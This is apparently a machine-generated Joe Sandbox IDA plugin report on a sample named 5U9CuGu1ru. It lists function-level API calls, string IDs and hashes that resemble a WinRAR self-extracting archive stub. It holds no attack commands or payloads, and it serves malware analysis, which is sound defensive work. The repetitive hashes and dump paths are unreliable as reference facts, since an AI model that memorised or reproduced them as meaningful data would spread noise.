              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
              • String ID: rtmp%d
              • API String ID: 2111052971-3303766350
              • Opcode ID: d0e2bc44c786db52d388799bc5fe29607301f1983d782d93e1f5eb0a45b7e74b
              • Instruction ID: 0e92b1c830bca63a8ba383edf780443c3213db033d0f3326609612c3a6e43809
              • Opcode Fuzzy Hash: d0e2bc44c786db52d388799bc5fe29607301f1983d782d93e1f5eb0a45b7e74b
              • Instruction Fuzzy Hash: 23415E71900258A6DF70EBA48C85ADB737CFF65380F0444E5F699E3192EB748B88CA65
              APIs
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00818F38
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00818F59
              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00818F80
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Global$AllocByteCharCreateMultiStreamWide
              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
              • API String ID: 4094277203-4209811716
              • Opcode ID: 57d691d4c6f19548d8ce7497d5077ae2960058b45dade410adb69f57a29894d5
              • Instruction ID: 2e410978efb2807ce76b25288f7beb7119a0312e12889817bfad57a9a2d0374a
              • Opcode Fuzzy Hash: 57d691d4c6f19548d8ce7497d5077ae2960058b45dade410adb69f57a29894d5
              • Instruction Fuzzy Hash: D8311831508715BBD721AB28AC07FEF775DFF81760F100519F811D62C1EF689A8983A6
              APIs
              • __aulldiv.LIBCMT ref: 00810A9D
                • Part of subcall function 0080ACF5: GetVersionExW.KERNEL32(?), ref: 0080AD1A
              • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00810AC0
              • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00810AD2
              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00810AE3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00810AF3
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00810B03
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00810B3D
              • __aullrem.LIBCMT ref: 00810BCB
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
              • String ID:
              • API String ID: 1247370737-0
              • Opcode ID: d9af689a9f2c8e34b3f48d9a3220dad084ccd5f513f09f4b0af5f6c1bc6072d3
              • Instruction ID: d17968a80223fd5df3e51ccdc4fe19172161c9fa3bd7fc6904141127c870f5a5
              • Opcode Fuzzy Hash: d9af689a9f2c8e34b3f48d9a3220dad084ccd5f513f09f4b0af5f6c1bc6072d3
              • Instruction Fuzzy Hash: EA4116B14083069FC314DF64C8809ABBBE8FF88715F004E2EF596D2650E779E589CB52
              APIs
              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0082F5A2,?,00000000,?,00000000,00000000), ref: 0082EE6F
              • __fassign.LIBCMT ref: 0082EEEA
              • __fassign.LIBCMT ref: 0082EF05
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0082EF2B
              • WriteFile.KERNEL32(?,?,00000000,0082F5A2,00000000,?,?,?,?,?,?,?,?,?,0082F5A2,?), ref: 0082EF4A
              • WriteFile.KERNEL32(?,?,00000001,0082F5A2,00000000,?,?,?,?,?,?,?,?,?,0082F5A2,?), ref: 0082EF83
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: a5152359e8abe7d61603f165c508076ba3fd0beea1b7559ec49d915da8258fe0
              • Instruction ID: 9bfe02a5bfa226dd877cef4d0f18e73c0eee23b09dc4549c1bc9fbba56adc361
              • Opcode Fuzzy Hash: a5152359e8abe7d61603f165c508076ba3fd0beea1b7559ec49d915da8258fe0
              • Instruction Fuzzy Hash: F851E671E002199FCB10CFA8ED45AEEBBF9FF09300F14455AE955E7291DB709980CB65
              APIs
              • GetTempPathW.KERNEL32(00000800,?), ref: 0081C54A
              • _swprintf.LIBCMT ref: 0081C57E
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
              • SetDlgItemTextW.USER32(?,00000066,0084946A), ref: 0081C59E
              • _wcschr.LIBVCRUNTIME ref: 0081C5D1
              • EndDialog.USER32(?,00000001), ref: 0081C6B2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
              • String ID: %s%s%u
              • API String ID: 2892007947-1360425832
              • Opcode ID: 4a5dc7fed060df2207f6331940b1d46784f6c3fa67970ec7bcc5fd6d555242c9
              • Instruction ID: 6e9e3b0c74019ca767843af1b625bf5515a6cc9e2188c0f3e33c0d5dffb9fcdd
              • Opcode Fuzzy Hash: 4a5dc7fed060df2207f6331940b1d46784f6c3fa67970ec7bcc5fd6d555242c9
              • Instruction Fuzzy Hash: D141F0B1D4061CAADB26DBA4DC45EEA7BBDFF08305F0040A6E509E70A1EB759BC4CB51
              APIs
              • ShowWindow.USER32(?,00000000), ref: 0081964E
              • GetWindowRect.USER32(?,00000000), ref: 00819693
              • ShowWindow.USER32(?,00000005,00000000), ref: 0081972A
              • SetWindowTextW.USER32(?,00000000), ref: 00819732
              • ShowWindow.USER32(00000000,00000005), ref: 00819748
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: 3aeb8992a3424da2915a141fae491da93599639a07ac12c66898c5c2895993e4
              • Instruction ID: 751804499f9f3400cdc3d95d64200f482aaf65be7b461d76a4b2313486d40dc0
              • Opcode Fuzzy Hash: 3aeb8992a3424da2915a141fae491da93599639a07ac12c66898c5c2895993e4
              • Instruction Fuzzy Hash: B031C231008210EFDB119F64DC48BABBBACFF49711F014599FE89D6192CB74E994CB61
              APIs
                • Part of subcall function 0082BF79: _free.LIBCMT ref: 0082BFA2
              • _free.LIBCMT ref: 0082C003
                • Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
                • Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506
              • _free.LIBCMT ref: 0082C00E
              • _free.LIBCMT ref: 0082C019
              • _free.LIBCMT ref: 0082C06D
              • _free.LIBCMT ref: 0082C078
              • _free.LIBCMT ref: 0082C083
              • _free.LIBCMT ref: 0082C08E
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: 15cbb8018299150a5b764baf6382cfad54f18551f59782254f70db907b4b1b74
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 2D114D31542B24F6DA20BBB4DD06FCBB799FF04700F408894B699E6452DF74A9849A92
              APIs
              • GetLastError.KERNEL32(?,?,008220C1,0081FB12), ref: 008220D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008220E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008220FF
              • SetLastError.KERNEL32(00000000,?,008220C1,0081FB12), ref: 00822151
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 67e8ebca652f6da80d4856152785d21da70e3dcb3d15062d86523ba0b40846f7
              • Instruction ID: b4543cea78526ef6989658814dd5a64a96ba67b13d99e0d3b9748f544c32e4aa
              • Opcode Fuzzy Hash: 67e8ebca652f6da80d4856152785d21da70e3dcb3d15062d86523ba0b40846f7
              • Instruction Fuzzy Hash: 5201F732209B31BEB7642BB9BC8AA2A3B88FB617747210A29F710D51E0FF515DE1D144
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: 5d2a2b4a56c50af4f4373a11ebb156a1c587fe7d0fa9a14a3c0b841e91a5ed6b
              • Instruction ID: ab65c3a53785b93d077ef0118fae62d5965ea6bb32e9477f3d5cb0d8ced3b6f4
              • Opcode Fuzzy Hash: 5d2a2b4a56c50af4f4373a11ebb156a1c587fe7d0fa9a14a3c0b841e91a5ed6b
              • Instruction Fuzzy Hash: 5F01D1616417225B8F305EA4AC917E723DCFF81316320292AE901D7340EA91C8C1DAE4
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00810D0D
                • Part of subcall function 0080ACF5: GetVersionExW.KERNEL32(?), ref: 0080AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00810CB8), ref: 00810D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00810D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00810D56
              • SystemTimeToFileTime.KERNEL32(?,00810CB8), ref: 00810D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00810D72
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: f62de4368d721b9af37f118e894f32bbcff53e0bc06c86eb7a12b44c8e75beef
              • Instruction ID: 1c594c7c63a921c3eb22721f53fc642a504503f67a1d05fb342fb3cde6538036
              • Opcode Fuzzy Hash: f62de4368d721b9af37f118e894f32bbcff53e0bc06c86eb7a12b44c8e75beef
              • Instruction Fuzzy Hash: 0031C97A90020DEBCB04DFE5D8859EFBBBCFF58700B04456AE955E7210E7309685CB65
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 40912af7d8ded569e6d2ee8507ea79408a2469f366475c126918ede9fc8fcfe0
              • Instruction ID: 8265b78a155944899edbb821f267fc128c607d8f847c0b431c7b60e456cd7df6
              • Opcode Fuzzy Hash: 40912af7d8ded569e6d2ee8507ea79408a2469f366475c126918ede9fc8fcfe0
              • Instruction Fuzzy Hash: 41217F7160420EBBD7049B14DC91EBB77ADFF91788B108528FC59DB302E274EDC68692
              APIs
              • GetLastError.KERNEL32(?,00840EE8,00823E14,00840EE8,?,?,00823713,00000050,?,00840EE8,00000200), ref: 00828FA9
              • _free.LIBCMT ref: 00828FDC
              • _free.LIBCMT ref: 00829004
              • SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 00829011
              • SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 0082901D
              • _abort.LIBCMT ref: 00829023
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 553710c277c04d6b8109c32cc630e107f654b76903454fd082b14c164cdf6727
              • Instruction ID: 26b8c1b3cc47286a2c19f3b498ecf4bc39e06b97896384479478d8e15f71f830
              • Opcode Fuzzy Hash: 553710c277c04d6b8109c32cc630e107f654b76903454fd082b14c164cdf6727
              • Instruction Fuzzy Hash: 72F0F435506A31EBCA25732C7D0AB2B2A5AFFE0760F250414F514E2292EF30C9C15416
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0081D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0081D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0081D31D
              • TranslateMessage.USER32(?), ref: 0081D327
              • DispatchMessageW.USER32(?), ref: 0081D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0081D33C
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: 47e90c9f90222330e0b3e09001416e1ea8c602fa098a5cbc987cde0801a4545c
              • Instruction ID: 4075bec9380cae376ebb189642ed3c4075b96fabc0d6f64de9e6ee794e773e75
              • Opcode Fuzzy Hash: 47e90c9f90222330e0b3e09001416e1ea8c602fa098a5cbc987cde0801a4545c
              • Instruction Fuzzy Hash: 5CF03C72A01A19BBCB216BA1EC4CEDBBF6DFF51391F008452F606D2150E6758581CBA2
              APIs
              • _wcschr.LIBVCRUNTIME ref: 0081C435
                • Part of subcall function 008117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0080BB05,00000000,.exe,?,?,00000800,?,?,008185DF,?), ref: 008117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: cb2d10d5c55af575e8fdc1f949d8fb5ce6636e4e5bdbeb2f2509998f4c4f3561
              • Instruction ID: 40495ff53c8590ece7fd19b32a6bbab4522aee55b4c0e401b97d8e15206a8331
              • Opcode Fuzzy Hash: cb2d10d5c55af575e8fdc1f949d8fb5ce6636e4e5bdbeb2f2509998f4c4f3561
              • Instruction Fuzzy Hash: 4431AF7294421DAADF26DA98CC85EEB77BDFF54304F0040A6FA09D2190EBB49EC48A51
              APIs
              • LoadBitmapW.USER32(00000065), ref: 0081ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0081AE22
              • DeleteObject.GDI32(00000000), ref: 0081AE54
              • DeleteObject.GDI32(00000000), ref: 0081AE77
                • Part of subcall function 00819E1C: FindResourceW.KERNEL32(0081AE4D,PNG,?,?,?,0081AE4D,00000066), ref: 00819E2E
                • Part of subcall function 00819E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0081AE4D,00000066), ref: 00819E46
                • Part of subcall function 00819E1C: LoadResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E59
                • Part of subcall function 00819E1C: LockResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E64
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: dd31a5f83c5218669fea95dcae73b98bf2d17d8d3ed4cb25dcbedfa83224977c
              • Instruction ID: 78f66faa464c7a5c84962873fcc3b8a08f2749bafb48c8eea6c9b3b244c7a953
              • Opcode Fuzzy Hash: dd31a5f83c5218669fea95dcae73b98bf2d17d8d3ed4cb25dcbedfa83224977c
              • Instruction Fuzzy Hash: AA014036941A15A6C7106768EC15AFF7B7EFF81B02F080010FD40E7291DAB28C6582A3
              APIs
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              • EndDialog.USER32(?,00000001), ref: 0081CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0081CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0081CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 0081CD14
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: 6ccc593fb556381a7fe62256373666d95aca8904dca22a9892f8743e2804ceda
              • Instruction ID: 30eb42c1363636bcdaec82d725766d7acfc42a86f4dcfb9fdcfcb277d5ece2a1
              • Opcode Fuzzy Hash: 6ccc593fb556381a7fe62256373666d95aca8904dca22a9892f8743e2804ceda
              • Instruction Fuzzy Hash: A10128322C47147AD5215F64AC09FE77B9DFF5A743F110410F345E20E0C6A6AD448BA6
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00827573,00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002), ref: 008275E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008275F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00827573,00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002), ref: 00827618
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
